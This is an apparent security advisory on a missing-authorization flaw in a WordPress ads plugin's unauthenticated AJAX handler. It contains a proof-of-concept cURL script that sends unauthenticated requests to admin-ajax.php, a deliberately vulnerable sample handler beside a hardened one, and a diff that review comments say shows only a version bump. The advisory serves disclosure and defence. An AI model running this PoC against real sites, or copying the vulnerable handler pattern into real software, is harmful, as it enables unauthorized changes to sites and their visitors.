Atomic Edge analysis of CVE-2026-24602:
The Raptive Ads WordPress plugin, versions up to and including 3.10.0, contains a missing authorization vulnerability. An unauthenticated attacker can trigger an action the plugin intended to restrict by calling one of its AJAX handlers directly through `/wp-admin/admin-ajax.php`. The vulnerability carries a CVSS score of 5.3, a medium-severity rating.
The root cause is a missing capability check on a function registered through the WordPress AJAX API. The plugin's main file, `adthrive-ads/adthrive-ads.php`, is the entry point that registers (directly or through the files it includes) the plugin's AJAX handlers. The affected handler is not named in this analysis; the placeholder `adthrive_ads_some_action` stands in for it below. It is hooked under both the `wp_ajax_` and the `wp_ajax_nopriv_` prefixes, so `admin-ajax.php` dispatches to it for logged-in and for logged-out requests alike. The handler neither calls `current_user_can()` nor verifies a nonce. Of those two, only the capability check is authorization: a nonce defends against CSRF, and a nonce minted for a logged-out visitor (user ID 0) is obtainable by anyone who can load a page that embeds it, so adding `check_ajax_referer()` alone would not close an unauthenticated path.
Exploitation is a single POST to the WordPress AJAX endpoint, `/wp-admin/admin-ajax.php`, with the `action` parameter set to the hook suffix (for the placeholder above, `adthrive_ads_some_action`) plus whatever other parameters the handler reads from the request. Because the request carries no session cookie, `admin-ajax.php` routes it to the `wp_ajax_nopriv_` hook, and no nonce is needed because the handler never checks one; a plain cURL request suffices. When reading the result, keep in mind that `admin-ajax.php` answers an action with no registered `wp_ajax_nopriv_` hook with HTTP 400 and the body `0`, so that response means either the action name is wrong or the site no longer registers an unauthenticated hook of that name.
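The action name is the one thing this analysis does not pin down, and grepping for `wp_ajax_nopriv_` misses hooks registered through variables or loops. The script below is an added audit helper written for this analysis, not part of Raptive Ads or Atomic Edge's tooling: run inside a loaded WordPress install (for example with `wp eval-file`), it walks the global `$wp_filter` table and lists every `wp_ajax_nopriv_` hook whose callback is defined under the plugin directory named in the diff, with the file and line to read next. It assumes WordPress 4.7 or later (where `$wp_filter` entries are `WP_Hook` objects); the plugin directory and the `ae_` function names are assumptions.

```php
<?php
/**
 * Enumerate wp_ajax_nopriv_ hooks whose callbacks live in one plugin directory.
 *
 * Added audit helper for this analysis; not part of Raptive Ads. Run inside a
 * loaded WordPress install, e.g.:  wp eval-file list-nopriv-hooks.php
 * Assumes WordPress 4.7+ ($wp_filter entries are WP_Hook objects).
 */

// Directory taken from the file path in the advisory's diff; adjust as needed.
$plugin_dir = trailingslashit( WP_PLUGIN_DIR ) . 'adthrive-ads/';

/**
 * Resolve a WordPress callback to [file, line] where it is defined,
 * or null when it cannot be reflected (e.g. an invokable object).
 */
function ae_locate_callback( $callback ) {
    try {
        if ( is_array( $callback ) && count( $callback ) === 2 ) {
            $ref = new ReflectionMethod( $callback[0], $callback[1] );   // [object|class, method]
        } elseif ( is_string( $callback ) && strpos( $callback, '::' ) !== false ) {
            $ref = new ReflectionMethod( $callback );                   // 'Class::method'
        } elseif ( is_string( $callback ) || $callback instanceof Closure ) {
            $ref = new ReflectionFunction( $callback );                 // named function or closure
        } else {
            return null;
        }
        return [ $ref->getFileName(), $ref->getStartLine() ];
    } catch ( ReflectionException $e ) {
        return null;
    }
}

/**
 * Return [ action => [file, line, has_priv] ] for every wp_ajax_nopriv_ hook
 * handled by code under $plugin_dir. has_priv is true when the same action is
 * also registered under wp_ajax_ (the dual registration described above).
 */
function ae_list_nopriv_hooks( $plugin_dir ) {
    global $wp_filter;
    $found = [];
    foreach ( $wp_filter as $hook => $wp_hook ) {
        if ( strpos( $hook, 'wp_ajax_nopriv_' ) !== 0 || ! ( $wp_hook instanceof WP_Hook ) ) {
            continue;
        }
        $action = substr( $hook, strlen( 'wp_ajax_nopriv_' ) );
        foreach ( $wp_hook->callbacks as $priority => $callbacks ) {
            foreach ( $callbacks as $cb ) {
                $loc = ae_locate_callback( $cb['function'] );
                if ( $loc && strpos( $loc[0], $plugin_dir ) === 0 ) {
                    $found[ $action ] = [
                        'file'     => $loc[0],
                        'line'     => $loc[1],
                        'has_priv' => has_action( 'wp_ajax_' . $action ) !== false,
                    ];
                }
            }
        }
    }
    ksort( $found );
    return $found;
}

foreach ( ae_list_nopriv_hooks( $plugin_dir ) as $action => $info ) {
    printf( "%-40s %s:%d%s\n", $action, $info['file'], $info['line'],
        $info['has_priv'] ? '  (also hooked under wp_ajax_)' : '' );
}
echo "Read each listed handler for current_user_can() / check_ajax_referer() before calling it.\n";
```

WP-CLI fires `init` and `wp_loaded` but not `admin_init`, so a handler that a plugin registers only inside an admin or `wp_doing_ajax()` branch will not appear here; for those, fall back to reading the registration code by hand.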
The fix shipped in version 3.11.0 adds an authorization check to the affected handler. The most likely shape is a capability check at the top of the function, such as `if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }`, or removal of the `wp_ajax_nopriv_` registration so that only logged-in users reach the handler; a nonce check is a worthwhile addition against CSRF but is not the authorization fix. The diff reproduced below shows only the version bump: the plugin header and the `ADTHRIVE_ADS_VERSION` constant move from 3.10.0 to 3.11.0. The hunk that changes the handler is not included, so the exact form of the fix cannot be confirmed from this page.
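To make the root cause and the fix concrete, here is the vulnerable registration pattern beside a hardened one. This is hypothetical plugin code written for this analysis, not Raptive Ads source; the `ae_example_*` action, function, option and script-handle names are placeholders. The vulnerable half shows the shape described in the root-cause paragraph (one handler under both prefixes, no check of any kind); the hardened half shows the two changes the patch paragraph anticipates, dropping the `nopriv` hook and adding `current_user_can()`, with a nonce check layered on top for CSRF.

```php
<?php
// Hypothetical plugin code written for this analysis; not the Raptive Ads
// source. Action, function, option and script-handle names are placeholders.
// Both patterns are shown in one file under different action names so they
// can coexist; a real plugin would have only one of them.

// --- Vulnerable pattern ---------------------------------------------------
// One handler hooked under both prefixes: logged-out visitors reach it via
// POST /wp-admin/admin-ajax.php  action=ae_example_save_settings
// and the handler never asks who is calling or whether the request was
// intended (no current_user_can(), no check_ajax_referer()).
add_action( 'wp_ajax_ae_example_save_settings',        'ae_example_save_settings_vulnerable' );
add_action( 'wp_ajax_nopriv_ae_example_save_settings', 'ae_example_save_settings_vulnerable' );

function ae_example_save_settings_vulnerable() {
    // Attacker-controlled POST data goes straight into the options table.
    $settings = isset( $_POST['settings'] ) ? wp_unslash( $_POST['settings'] ) : '';
    update_option( 'ae_example_settings', $settings );
    wp_send_json_success();
}

// --- Hardened pattern -----------------------------------------------------
// 1. No wp_ajax_nopriv_ registration: admin-ajax.php answers logged-out
//    requests for this action with "0" / HTTP 400 before plugin code runs.
// 2. check_ajax_referer() rejects requests without a nonce minted for this
//    action (CSRF defence; on failure it dies with -1 / HTTP 403).
// 3. current_user_can() is the authorization check that was missing.
add_action( 'wp_ajax_ae_example_save_settings_fixed', 'ae_example_save_settings_hardened' );

function ae_example_save_settings_hardened() {
    check_ajax_referer( 'ae_example_save_settings', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $settings = isset( $_POST['settings'] ) ? sanitize_text_field( wp_unslash( $_POST['settings'] ) ) : '';
    update_option( 'ae_example_settings', $settings );
    wp_send_json_success();
}

// The nonce the hardened handler expects is minted server-side for the
// logged-in user and handed to the admin page's script (handle assumed to be
// registered elsewhere), so only a page the user actually loaded can call it.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'ae-example-admin', 'aeExample', [
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'ae_example_save_settings' ),
    ] );
} );
```

Order matters in the hardened handler: the nonce check runs first so an unauthorized caller learns nothing about whether the capability check would have passed, and the capability check is what actually decides authorization; neither replaces the other.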
Successful exploitation lets an unauthenticated attacker perform an action intended for site administrators. The concrete impact depends on what the unprotected handler does; Atomic Edge research indicates the plausible outcomes are unauthorized modification of plugin settings, injection of attacker-controlled ad code into served pages, or exposure of data the plugin stores, any of which compromises site integrity and the safety of its visitors.
--- a/adthrive-ads/adthrive-ads.php
+++ b/adthrive-ads/adthrive-ads.php
@@ -7,7 +7,7 @@
* Plugin Name: Raptive Ads
* Plugin URI: http://www.raptive.com
* Description: Raptive Ads
- * Version: 3.10.0
+ * Version: 3.11.0
* Requires at least: 4.6
* Requires PHP: 5.6
* Author: Raptive
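Review bot: this hunk changes only the `Version:` header line from 3.10.0 to 3.11.0; the `current_user_can()` check or removal of the `wp_ajax_nopriv_` registration that the analysis attributes to 3.11.0 does not appear anywhere in the patch, so the hunk cannot be cited as evidence of the fix. Please include the hunk that touches the affected handler (or the file it lives in), or state explicitly that the authorization change is in a file not reproduced here.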
@@ -32,7 +32,7 @@
defined( 'ABSPATH' ) || die;
-define( 'ADTHRIVE_ADS_VERSION', '3.10.0' );
+define( 'ADTHRIVE_ADS_VERSION', '3.11.0' );
define( 'ADTHRIVE_ADS_FILE', __FILE__ );
define( 'ADTHRIVE_ADS_PATH', plugin_dir_path( ADTHRIVE_ADS_FILE ) );
define( 'ADTHRIVE_ADS_URL', trailingslashit( plugin_dir_url( ADTHRIVE_ADS_FILE ) ) );
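Review bot: only the `ADTHRIVE_ADS_VERSION` constant changes here, and the header `@@ -32,7 +32,7 @@` announces seven lines per side while five are shown, so two context lines were lost in extraction; nothing in the visible lines touches hook registration. A version-bump-only diff means a site operator reading this page can verify that 3.11.0 is installed but not that the `nopriv` path is closed; pair the constant bump with the handler hunk so the two can be reviewed together.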
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24602 - Raptive Ads <= 3.10.0 - Missing Authorization
//
// Configure the target WordPress site URL
$target_url = 'http://example.com/wp-admin/admin-ajax.php';
// The AJAX action parameter for the vulnerable function.
// This value must be determined through further code analysis of the plugin.
$vulnerable_action = 'adthrive_ads_example_action';
// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
// Set the action parameter. Add other required parameters if the function expects them.
curl_setopt($ch, CURLOPT_POSTFIELDS, ['action' => $vulnerable_action]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Send no cookies: without a WordPress session admin-ajax.php dispatches to the
// wp_ajax_nopriv_ hook, which is the path under test.
curl_setopt($ch, CURLOPT_COOKIE, '');
// Execute the request
$response = curl_exec($ch);
if ($response === false) {
    fwrite(STDERR, "cURL error: " . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Output the result
echo "Target: $target_url\n";
echo "Action: $vulnerable_action\n";
echo "HTTP Code: $http_code\n";
echo "Response: $response\n";
// Interpreting admin-ajax.php responses (current WordPress releases):
//   400 with body "0"   - no wp_ajax_nopriv_ hook is registered for this action name
//   403 with body "-1"  - a nonce check (check_ajax_referer) rejected the request
//   200 with body "0"   - the handler ran but produced no output of its own
//   200 with other body - the handler ran unauthenticated and answered
$body = trim($response);
if ($http_code == 400 && $body === '0') {
    echo "[-] No unauthenticated hook for this action; verify the action name.\n";
} elseif ($http_code == 403 && $body === '-1') {
    echo "[-] Request rejected by a nonce check.\n";
} elseif ($http_code == 200) {
    echo "[+] Handler reachable without authentication; inspect the response and the site for side effects.\n";
} else {
    echo "[-] No conclusive result.\n";
}